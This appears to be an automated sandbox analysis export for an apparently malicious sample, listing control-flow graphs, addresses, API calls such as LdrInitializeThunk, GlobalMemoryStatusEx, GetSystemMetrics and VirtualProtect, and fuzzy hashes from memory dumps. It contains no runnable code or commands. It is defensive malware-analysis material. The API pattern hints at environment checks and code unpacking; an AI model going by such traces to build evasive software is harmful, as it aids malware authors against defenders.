                        control_flow_graph 947 6aed258-6aed2e7 LdrInitializeThunk 955 6aed2ee-6aed3f9 947->955 973 6aed3ff-6aed42b 955->973 974 6aee056-6aee098 call 6ae0950 955->974 977 6aed4cb-6aed639 973->977 978 6aed431-6aed48a 973->978 991 6aee09d-6aee0a4 974->991 1016 6aed63f-6aed648 977->1016 1017 6aee033-6aee04f call 6ae0950 977->1017 978->974 995 6aed490-6aed4c5 978->995 995->977 1016->974 1018 6aed64e-6aed696 1016->1018 1017->991 1025 6aed69c-6aed7b8 1018->1025 1026 6aee051 1018->1026 1025->1026 1044 6aed7be-6aed8a6 1025->1044 1026->974 1044->974 1060 6aed8ac-6aed8b4 1044->1060 1060->974 1061 6aed8ba-6aed8c2 1060->1061 1061->974 1062 6aed8c8-6aed8eb 1061->1062 1064 6aed8ed-6aed8f1 1062->1064 1065 6aed901-6aed905 1062->1065 1064->974 1066 6aed8f7-6aed8ff 1064->1066 1067 6aed91f-6aed985 1065->1067 1068 6aed907-6aed90b 1065->1068 1066->1065 1078 6aed98e 1067->1078 1079 6aed987-6aed98c 1067->1079 1068->974 1069 6aed911-6aed919 1068->1069 1069->1067 1080 6aed995-6aed9d8 1078->1080 1079->1080 1084 6aed9de-6aeda3b 1080->1084 1085 6aedff1-6aee01f 1080->1085 1095 6aedfd1-6aedfd7 1084->1095 1096 6aeda41-6aeda9f 1084->1096 1085->1026 1090 6aee021-6aee02d 1085->1090 1090->1016 1090->1017 1097 6aedfdd-6aedfe3 1095->1097 1096->1095 1105 6aedaa5-6aedb03 1096->1105 1097->1026 1098 6aedfe5-6aedfeb 1097->1098 1098->1084 1098->1085 1105->1095 1112 6aedb09-6aedbcf 1105->1112 1128 6aedc04-6aedc0a 1112->1128 1129 6aedbd1-6aedbfe 1112->1129 1128->1026 1130 6aedc10-6aedc17 1128->1130 1129->1128 1141 6aedd79-6aedd7d 1129->1141 1131 6aedc1d-6aedc23 1130->1131 1132 6aedca4-6aedd01 1130->1132 1131->1026 1134 6aedc29-6aedc2c 1131->1134 1148 6aedd67-6aedd74 1132->1148 1149 6aedd03-6aedd61 1132->1149 1134->1132 1141->1097 1142 6aedd83-6aeddb0 1141->1142 1153 6aedde5-6aeddeb 1142->1153 1154 6aeddb2-6aedddf 1142->1154 1148->1097 1149->1148 1172 6aedc2e-6aedc9b 1149->1172 1153->1026 1156 6aeddf1-6aeddf8 1153->1156 1154->1097 1154->1153 1159 6aeddfa-6aede00 1156->1159 1160 6aede09-6aede2d 1156->1160 1159->1026 1161 6aede06 1159->1161 1171 6aedea5-6aedf02 1160->1171 1161->1160 1185 6aedf68-6aedfcf 1171->1185 1186 6aedf04-6aedf62 1171->1186 1172->1026 1193 6aedca1 1172->1193 1185->1085 1186->1185 1202 6aede2f-6aede9c 1186->1202 1193->1132 1202->1026 1212 6aedea2 1202->1212 1212->1171
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2525234523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6ae0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 9a510455882af905bf71b440f69a6e2e30ee231ee4c784fc4b54f54a7bf4135b
                        • Instruction ID: 13907c56faf82f8012a68d6ab96161a7382553802d311376048781c6a356b693
                        • Opcode Fuzzy Hash: 9a510455882af905bf71b440f69a6e2e30ee231ee4c784fc4b54f54a7bf4135b
                        • Instruction Fuzzy Hash: 4B821B70B402149FDBA4EB79D858BAE7BF2BF89300F6084A9D419EB394DE719C41CB51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1625 6aed24a-6aed255 1626 6aed286-6aed2be 1625->1626 1627 6aed257-6aed283 1625->1627 1633 6aed2c9-6aed2e7 LdrInitializeThunk 1626->1633 1627->1626 1634 6aed2ee-6aed3f9 1633->1634 1652 6aed3ff-6aed42b 1634->1652 1653 6aee056-6aee098 call 6ae0950 1634->1653 1656 6aed4cb-6aed639 1652->1656 1657 6aed431-6aed48a 1652->1657 1670 6aee09d-6aee0a4 1653->1670 1695 6aed63f-6aed648 1656->1695 1696 6aee033-6aee04f call 6ae0950 1656->1696 1657->1653 1674 6aed490-6aed4c5 1657->1674 1674->1656 1695->1653 1697 6aed64e-6aed696 1695->1697 1696->1670 1704 6aed69c-6aed7b8 1697->1704 1705 6aee051 1697->1705 1704->1705 1723 6aed7be-6aed8a6 1704->1723 1705->1653 1723->1653 1739 6aed8ac-6aed8b4 1723->1739 1739->1653 1740 6aed8ba-6aed8c2 1739->1740 1740->1653 1741 6aed8c8-6aed8eb 1740->1741 1743 6aed8ed-6aed8f1 1741->1743 1744 6aed901-6aed905 1741->1744 1743->1653 1745 6aed8f7-6aed8ff 1743->1745 1746 6aed91f-6aed985 1744->1746 1747 6aed907-6aed90b 1744->1747 1745->1744 1757 6aed98e 1746->1757 1758 6aed987-6aed98c 1746->1758 1747->1653 1748 6aed911-6aed919 1747->1748 1748->1746 1759 6aed995-6aed9d8 1757->1759 1758->1759 1763 6aed9de-6aeda3b 1759->1763 1764 6aedff1-6aee01f 1759->1764 1774 6aedfd1-6aedfd7 1763->1774 1775 6aeda41-6aeda9f 1763->1775 1764->1705 1769 6aee021-6aee02d 1764->1769 1769->1695 1769->1696 1776 6aedfdd-6aedfe3 1774->1776 1775->1774 1784 6aedaa5-6aedb03 1775->1784 1776->1705 1777 6aedfe5-6aedfeb 1776->1777 1777->1763 1777->1764 1784->1774 1791 6aedb09-6aedbcf 1784->1791 1807 6aedc04-6aedc0a 1791->1807 1808 6aedbd1-6aedbfe 1791->1808 1807->1705 1809 6aedc10-6aedc17 1807->1809 1808->1807 1820 6aedd79-6aedd7d 1808->1820 1810 6aedc1d-6aedc23 1809->1810 1811 6aedca4-6aedd01 1809->1811 1810->1705 1813 6aedc29-6aedc2c 1810->1813 1827 6aedd67-6aedd74 1811->1827 1828 6aedd03-6aedd61 1811->1828 1813->1811 1820->1776 1821 6aedd83-6aeddb0 1820->1821 1832 6aedde5-6aeddeb 1821->1832 1833 6aeddb2-6aedddf 1821->1833 1827->1776 1828->1827 1851 6aedc2e-6aedc9b 1828->1851 1832->1705 1835 6aeddf1-6aeddf8 1832->1835 1833->1776 1833->1832 1838 6aeddfa-6aede00 1835->1838 1839 6aede09-6aede2d 1835->1839 1838->1705 1840 6aede06 1838->1840 1850 6aedea5-6aedf02 1839->1850 1840->1839 1864 6aedf68-6aedfcf 1850->1864 1865 6aedf04-6aedf62 1850->1865 1851->1705 1872 6aedca1 1851->1872 1864->1764 1865->1864 1881 6aede2f-6aede9c 1865->1881 1872->1811 1881->1705 1891 6aedea2 1881->1891 1891->1850
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2525234523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6ae0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ee78405359f3e327f78a27edf64e2a3f129934a9abf776c5c8730ab9588895a4
                        • Instruction ID: 168036f56b8e400638a74a1bb1a525b2138c11fdfb96a30104ed8ee5770633f6
                        • Opcode Fuzzy Hash: ee78405359f3e327f78a27edf64e2a3f129934a9abf776c5c8730ab9588895a4
                        • Instruction Fuzzy Hash: 2F620B70A402148FDBA4EB79C854BAEBBF2BF89300F2184A9D419EB395DB719C41CF51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1892 6b7dcb0-6b7dd05 LdrInitializeThunk 1893 6b7dda3-6b7ddae 1892->1893 1894 6b7dd0b-6b7dd1e 1892->1894 1895 6b7ddc1-6b7ddd4 1893->1895 1896 6b7ddb0-6b7ddbc 1893->1896 1897 6b7dd24-6b7dd73 1894->1897 1898 6b7e28d-6b7e2be 1894->1898 1895->1898 1900 6b7ddda-6b7ddf0 1895->1900 1899 6b7e2e9-6b7e2f0 1896->1899 1921 6b7dd75-6b7dd82 1897->1921 1922 6b7dd84-6b7dd91 1897->1922 1903 6b7e2f7-6b7e305 1899->1903 1904 6b7e2f2 1899->1904 1900->1898 1902 6b7ddf6-6b7de33 1900->1902 1915 6b7de39-6b7de61 1902->1915 1916 6b7e288 1902->1916 1904->1903 1915->1898 1923 6b7de67-6b7de90 1915->1923 1916->1898 1921->1893 1922->1916 1924 6b7dd97-6b7dd9d 1922->1924 1923->1916 1926 6b7de96-6b7dea2 1923->1926 1924->1893 1924->1894 1927 6b7e203-6b7e216 1926->1927 1928 6b7dea8-6b7deb8 1926->1928 1927->1898 1929 6b7e218-6b7e22b 1927->1929 1928->1898 1930 6b7debe-6b7deeb 1928->1930 1929->1916 1931 6b7e22d-6b7e241 1929->1931 1930->1898 1938 6b7def1-6b7df93 call 6b7e3a8 1930->1938 1931->1916 1934 6b7e243-6b7e248 call 158dd60 1931->1934 1936 6b7e24e-6b7e251 1934->1936 1936->1899 1951 6b7e0a1-6b7e0b1 1938->1951 1952 6b7df99-6b7dfa9 1938->1952 1951->1898 1953 6b7e0b7-6b7e130 call 6b7e3a8 1951->1953 1952->1898 1954 6b7dfaf-6b7e02b 1952->1954 1974 6b7e136-6b7e148 call 6b76600 1953->1974 1954->1898 1973 6b7e031-6b7e039 1954->1973 1973->1898 1975 6b7e03f-6b7e06b 1973->1975 1974->1927 1979 6b7e14e-6b7e164 1974->1979 1980 6b7e090-6b7e099 1975->1980 1981 6b7e06d-6b7e071 1975->1981 1982 6b7e166-6b7e16c 1979->1982 1983 6b7e17c-6b7e184 1979->1983 1980->1951 1981->1898 1984 6b7e077-6b7e08e 1981->1984 1985 6b7e170-6b7e17a 1982->1985 1986 6b7e16e 1982->1986 1983->1916 1988 6b7e18a-6b7e1ca call 6b79258 1983->1988 1984->1980 1985->1983 1986->1983 1988->1898 1996 6b7e1d0-6b7e1f1 1988->1996 1996->1916 1999 6b7e1f7-6b7e1fd 1996->1999 1999->1927 1999->1928
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2525928017.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6b70000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 47021ce2a2a07f45c420a9289d34a4d5d4166ebd9d89bef2296a8dc38ba3e1fa
                        • Instruction ID: 4111c4c855f3dc52ea273106f92c99417a166222d9ea57d9250fc75730c89f2f
                        • Opcode Fuzzy Hash: 47021ce2a2a07f45c420a9289d34a4d5d4166ebd9d89bef2296a8dc38ba3e1fa
                        • Instruction Fuzzy Hash: B9024270E002199FDB54DFA8C844B9DBBF2BF88300F6585A9D425AB395DB74EC46CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2003 158a7f0-158a7fb 2004 158a7fd-158a824 call 1589db0 2003->2004 2005 158a825-158a844 call 1589dbc 2003->2005 2011 158a84a-158a8a9 2005->2011 2012 158a846-158a849 2005->2012 2019 158a8ab-158a8ae 2011->2019 2020 158a8af-158a93c GlobalMemoryStatusEx 2011->2020 2024 158a93e-158a944 2020->2024 2025 158a945-158a96d 2020->2025 2024->2025
                        Memory Dump Source
                        • Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 257b7d887660c6786458bb92d7de221e41baa54b4042686dacb5fcac9f050e6f
                        • Instruction ID: 47649c77feec02f4efa813b814721eca7350482a9139374f1c06fcf53489dc39
                        • Opcode Fuzzy Hash: 257b7d887660c6786458bb92d7de221e41baa54b4042686dacb5fcac9f050e6f
                        • Instruction Fuzzy Hash: 0941E272D143598FDB14DF69D8043EEBBF5BF89210F14856AD508AB341DB789841CBE1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2028 6b7dca0-6b7dcaf 2029 6b7dcb0-6b7dd05 LdrInitializeThunk 2028->2029 2030 6b7dda3-6b7ddae 2029->2030 2031 6b7dd0b-6b7dd1e 2029->2031 2032 6b7ddc1-6b7ddd4 2030->2032 2033 6b7ddb0-6b7ddbc 2030->2033 2034 6b7dd24-6b7dd73 2031->2034 2035 6b7e28d-6b7e2be 2031->2035 2032->2035 2037 6b7ddda-6b7ddf0 2032->2037 2036 6b7e2e9-6b7e2f0 2033->2036 2058 6b7dd75-6b7dd82 2034->2058 2059 6b7dd84-6b7dd91 2034->2059 2040 6b7e2f7-6b7e305 2036->2040 2041 6b7e2f2 2036->2041 2037->2035 2039 6b7ddf6-6b7de33 2037->2039 2052 6b7de39-6b7de61 2039->2052 2053 6b7e288 2039->2053 2041->2040 2052->2035 2060 6b7de67-6b7de90 2052->2060 2053->2035 2058->2030 2059->2053 2061 6b7dd97-6b7dd9d 2059->2061 2060->2053 2063 6b7de96-6b7dea2 2060->2063 2061->2030 2061->2031 2064 6b7e203-6b7e216 2063->2064 2065 6b7dea8-6b7deb8 2063->2065 2064->2035 2066 6b7e218-6b7e22b 2064->2066 2065->2035 2067 6b7debe-6b7deeb 2065->2067 2066->2053 2068 6b7e22d-6b7e241 2066->2068 2067->2035 2075 6b7def1-6b7df49 2067->2075 2068->2053 2071 6b7e243-6b7e248 call 158dd60 2068->2071 2073 6b7e24e-6b7e251 2071->2073 2073->2036 2083 6b7df50-6b7df5c call 6b7e3a8 2075->2083 2084 6b7df62-6b7df93 2083->2084 2088 6b7e0a1-6b7e0b1 2084->2088 2089 6b7df99-6b7dfa9 2084->2089 2088->2035 2090 6b7e0b7-6b7e116 2088->2090 2089->2035 2091 6b7dfaf-6b7e02b 2089->2091 2108 6b7e120-6b7e130 call 6b7e3a8 2090->2108 2091->2035 2110 6b7e031-6b7e039 2091->2110 2111 6b7e136-6b7e148 call 6b76600 2108->2111 2110->2035 2112 6b7e03f-6b7e06b 2110->2112 2111->2064 2116 6b7e14e-6b7e164 2111->2116 2117 6b7e090-6b7e099 2112->2117 2118 6b7e06d-6b7e071 2112->2118 2119 6b7e166-6b7e16c 2116->2119 2120 6b7e17c-6b7e184 2116->2120 2117->2088 2118->2035 2121 6b7e077-6b7e08e 2118->2121 2122 6b7e170-6b7e17a 2119->2122 2123 6b7e16e 2119->2123 2120->2053 2125 6b7e18a-6b7e1ca call 6b79258 2120->2125 2121->2117 2122->2120 2123->2120 2125->2035 2133 6b7e1d0-6b7e1f1 2125->2133 2133->2053 2136 6b7e1f7-6b7e1fd 2133->2136 2136->2064 2136->2065
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2525928017.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6b70000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 3a32f9afee6fc4e05a2d39a4c705e809ee202d522786f4d803610497bbb0ab63
                        • Instruction ID: bcd2bd2a2edfc6dedfae635cdf14f2fefaae64a1c7c3a5dd2870738546a92083
                        • Opcode Fuzzy Hash: 3a32f9afee6fc4e05a2d39a4c705e809ee202d522786f4d803610497bbb0ab63
                        • Instruction Fuzzy Hash: 31315AB0E012198FDB24DFA8C54479DBBB2FF89314F2085A9D425AB381DB75AC46CB94

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2140 6ae0040-6ae007e LdrInitializeThunk 2142 6ae0080-6ae008c 2140->2142 2143 6ae0091-6ae00a4 2140->2143 2146 6ae018e-6ae0195 2142->2146 2144 6ae00aa-6ae00ba 2143->2144 2145 6ae0132-6ae0163 2143->2145 2147 6ae00bc-6ae00c8 2144->2147 2148 6ae00cd-6ae00e3 2144->2148 2145->2146 2149 6ae019f-6ae01a6 2146->2149 2150 6ae0197-6ae019c 2146->2150 2147->2146 2148->2145 2151 6ae00e5-6ae00f2 2148->2151 2150->2149 2151->2145 2153 6ae00f4-6ae00fb 2151->2153 2153->2146
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2525234523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6ae0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 4eae880d642411a819285eea2c50a828b163e401289ac814fe8215ee00a37b92
                        • Instruction ID: 4ba0eb0d0f400b984218c0087ae1d0b7e3a252d9ac1531c7533f0a89adf3ab70
                        • Opcode Fuzzy Hash: 4eae880d642411a819285eea2c50a828b163e401289ac814fe8215ee00a37b92
                        • Instruction Fuzzy Hash: 6F316574A00209AFDB44DF99D5C0ADEFBB2FF84304F65C258E4046B289C775AA95CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2156 158a880-158a88d 2157 158a8cf-158a906 2156->2157 2158 158a88f-158a89c 2156->2158 2161 158a90e-158a93c GlobalMemoryStatusEx 2157->2161 2159 158a829-158a83b 2158->2159 2160 158a89e-158a8ae 2158->2160 2162 158a842-158a844 2159->2162 2163 158a83d call 1589dbc 2159->2163 2164 158a93e-158a944 2161->2164 2165 158a945-158a96d 2161->2165 2166 158a84a-158a8a9 2162->2166 2167 158a846-158a849 2162->2167 2163->2162 2164->2165 2176 158a8ab-158a8ae 2166->2176 2177 158a8af-158a906 2166->2177 2177->2161
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0158A842), ref: 0158A92F
                        Memory Dump Source
                        • Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: 338ce813b260adb39f24b416c4c11e39be0133e27ff7713d3eef89d3057bf458
                        • Instruction ID: e0273e43d5f31749d477a669123f6735a662f877671702d93df9e638a35a72c6
                        • Opcode Fuzzy Hash: 338ce813b260adb39f24b416c4c11e39be0133e27ff7713d3eef89d3057bf458
                        • Instruction Fuzzy Hash: 8821BDB2D042598FDB10DFA9D4043DDFBB0FF49220F18856AC858BB242D37899468FA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2180 6ae0006-6ae0014 2181 6ae0016-6ae0053 2180->2181 2182 6ae0054-6ae007e LdrInitializeThunk 2180->2182 2181->2182 2184 6ae0080-6ae008c 2182->2184 2185 6ae0091-6ae00a4 2182->2185 2188 6ae018e-6ae0195 2184->2188 2186 6ae00aa-6ae00ba 2185->2186 2187 6ae0132-6ae0163 2185->2187 2189 6ae00bc-6ae00c8 2186->2189 2190 6ae00cd-6ae00e3 2186->2190 2187->2188 2191 6ae019f-6ae01a6 2188->2191 2192 6ae0197-6ae019c 2188->2192 2189->2188 2190->2187 2193 6ae00e5-6ae00f2 2190->2193 2192->2191 2193->2187 2195 6ae00f4-6ae00fb 2193->2195 2195->2188
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2525234523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6ae0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5e92b70c9fb8fd386e32643afe73eaab6ff20205b1505b19197dde68e99d58be
                        • Instruction ID: b3b9ff94aae98595fc755307f211a1bd7f50141c048dcb9ccbed72ab5b81efb4
                        • Opcode Fuzzy Hash: 5e92b70c9fb8fd386e32643afe73eaab6ff20205b1505b19197dde68e99d58be
                        • Instruction Fuzzy Hash: 5021E4319463849FC746DBA4D8946CDBFB6EF46324F19459AE040AB293C3785C89CBA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2205 158a8c0-158a906 2207 158a90e-158a93c GlobalMemoryStatusEx 2205->2207 2208 158a93e-158a944 2207->2208 2209 158a945-158a96d 2207->2209 2208->2209
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0158A842), ref: 0158A92F
                        Memory Dump Source
                        • Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: 406823a8c3609905eda9b800263e7be62ee4c60df93ddde9fb7926d401835184
                        • Instruction ID: 436ac4a39e5bad7c20a188968d92231c55d350f94a28d2d9be442946bd2ce98e
                        • Opcode Fuzzy Hash: 406823a8c3609905eda9b800263e7be62ee4c60df93ddde9fb7926d401835184
                        • Instruction Fuzzy Hash: AB1144B1C046599FDB20DFAAC544BDEFBF4BF09320F15812AD918A7241D378A940CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2198 1589dbc-158a93c GlobalMemoryStatusEx 2201 158a93e-158a944 2198->2201 2202 158a945-158a96d 2198->2202 2201->2202
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0158A842), ref: 0158A92F
                        Memory Dump Source
                        • Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: a4608b6d2da9692fd26bb433ae3bcca185ed338a50c9c9b1695a72ebebe52f44
                        • Instruction ID: 0a6461ca70933d083530105afb9cd4262d823a09ed545bc59ccbcb05b8ea65d2
                        • Opcode Fuzzy Hash: a4608b6d2da9692fd26bb433ae3bcca185ed338a50c9c9b1695a72ebebe52f44
                        • Instruction Fuzzy Hash: A21122B1C046599BDB10DF9AC4447EEFBF4EB08220F14852AD918B7240D378A950CFA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2212 158a5d8-158a62e 2215 158a634-158a665 GetSystemMetrics 2212->2215 2217 158a66e-158a682 2215->2217 2218 158a667-158a66d 2215->2218 2218->2217
                        APIs
                        • GetSystemMetrics.USER32(00000043), ref: 0158A654
                        Memory Dump Source
                        • Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: 3dfbf65f567dab798bce2652bf64bc635807ca13042e80d7391c7765fca9ed9e
                        • Instruction ID: 6f2d1cf298cd64e617a65ef387a5ee4d61419035fc78bccb0352ac852e79e252
                        • Opcode Fuzzy Hash: 3dfbf65f567dab798bce2652bf64bc635807ca13042e80d7391c7765fca9ed9e
                        • Instruction Fuzzy Hash: CE1149B5C043488FDB14AF9AD4497DEBBF4EB48314F20882AD55AA7240D7746644CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2220 158a5e8-158a62e 2222 158a634-158a665 GetSystemMetrics 2220->2222 2224 158a66e-158a682 2222->2224 2225 158a667-158a66d 2222->2225 2225->2224
                        APIs
                        • GetSystemMetrics.USER32(00000043), ref: 0158A654
                        Memory Dump Source
                        • Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: fa4b9ca1d8f82dc45649eb36878eb0a87e54fc9ca6a7c77f75243bd1109631ac
                        • Instruction ID: 75c44ece41e4696d05a7570cf5362152e2d8915e02c7df96eef3e3aab5646198
                        • Opcode Fuzzy Hash: fa4b9ca1d8f82dc45649eb36878eb0a87e54fc9ca6a7c77f75243bd1109631ac
                        • Instruction Fuzzy Hash: 70113AB5C043088FDB14AF9AD4497DEBBF4EB48314F10882AD559A7240D7756544CFA5
                        Memory Dump Source
                        • Source File: 00000008.00000002.2498057240.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_12ed000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cf2839dcf411ed1fe060b95dc7c4015d3389135589df5301349919763518962
                        • Instruction ID: 3fc707f7a464bfb52225f35057d1c8351872393482bad07193dfa0f137635bb2
                        • Opcode Fuzzy Hash: 5cf2839dcf411ed1fe060b95dc7c4015d3389135589df5301349919763518962
                        • Instruction Fuzzy Hash: 57217576114208DFDB05DF54E9C8F26BBA1FB88310F64C56CEA090B246C336D446CEA2
                        Memory Dump Source
                        • Source File: 00000008.00000002.2498366472.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_12fd000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9674a4adcefeee76e7dd238d52ae4578157d4d5164d0ef0c36b31445fb95917e
                        • Instruction ID: 9a0a4f3eb4f19622e58a48d47c5ca107e7f12717f4e45779616584e0183ad563
                        • Opcode Fuzzy Hash: 9674a4adcefeee76e7dd238d52ae4578157d4d5164d0ef0c36b31445fb95917e
                        • Instruction Fuzzy Hash: FA212275614308DFDB15DF64D980B26FBA1EB84314F24C57DEA0A4B246C37BD847CA62
                        Memory Dump Source
                        • Source File: 00000008.00000002.2498366472.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_12fd000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 40d8998bc6c543b16e0b79c58a0dde9d01801ec195fca39c15b09d1936e5ed2f
                        • Instruction ID: a60c242899a3d27fe27d7d9e0250b1253cc942791d94973c0ffb31f076e6c50d
                        • Opcode Fuzzy Hash: 40d8998bc6c543b16e0b79c58a0dde9d01801ec195fca39c15b09d1936e5ed2f
                        • Instruction Fuzzy Hash: C12179755093848FDB13CF24D990B15BF71EB46314F28C5EED9498B6A7C33A980ACB62
                        Memory Dump Source
                        • Source File: 00000008.00000002.2498057240.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_12ed000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                        • Instruction ID: 7b96b7fdb4dcb78b6eb13f9d7fc79009aae876109255a6bf3130cd19fbce0129
                        • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                        • Instruction Fuzzy Hash: 4F11E176404284CFCB16CF54D5C4B16BFB1FB84314F2482A9D9090B657C33AD456CFA1

                        Execution Graph

                        Execution Coverage:2.7%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 14521 293feb8 14522 293ff00 VirtualProtect 14521->14522 14524 293ff3b 14522->14524

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 237 863da70-863da98 238 863da9a 237->238 239 863da9f-863dae1 237->239 238->239 240 863dae7-863db62 call 863def8 239->240 241 863db68-863db6f 239->241 240->241 242 863db75-863dbfa 241->242 243 863dd18-863dd63 241->243 267 863dd12 242->267 268 863dc00-863dc7c 242->268 253 863dd65-863dd7e 243->253 254 863ddb8-863de7f 243->254 253->254 260 863dd80-863ddb3 253->260 270 863de9e-863dea4 254->270 260->270 267->243 283 863dcdb-863dce4 268->283 271 863dea6 270->271 272 863deae 270->272 271->272 284 863dce6-863dcea 283->284 285 863dc7e-863dc87 283->285 284->267 287 863dcec-863dd07 284->287 288 863dc89 285->288 289 863dc8e-863dcc6 285->289 287->267 288->289 295 863dcd8 289->295 296 863dcc8-863dcd6 289->296 295->283 296->284
                        Memory Dump Source
                        • Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd
                        Similarity
                        • API ID:
